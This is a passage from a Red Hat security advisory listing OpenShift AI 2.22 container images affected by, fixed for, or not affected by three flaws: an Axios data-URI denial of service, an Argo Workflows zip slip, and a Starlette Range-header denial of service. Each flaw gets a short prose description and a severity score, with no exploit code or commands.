| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 | — |
Workaround
|
Threats
Impact
Moderate
A denial of service flaw has been discovered in the Axios npm package. When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.
5.3 (Medium)
Affected products
Fixed
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 | — |
Workaround
|
Threats
Impact
Moderate
A zip slip flaw has been discovered in the Argo Workflows container engine. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container.
7.1 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
37 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 | — |
Workaround
|
Threats
Impact
Important
A denial of service vulnerability has been discovered in the python Starlette framework. an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This induces CPU exhaustion per request, causing a denial‑of‑service for endpoints serving files.
7.5 (High)
Affected products
Fixed
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
38 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 | — |
Workaround
|
|
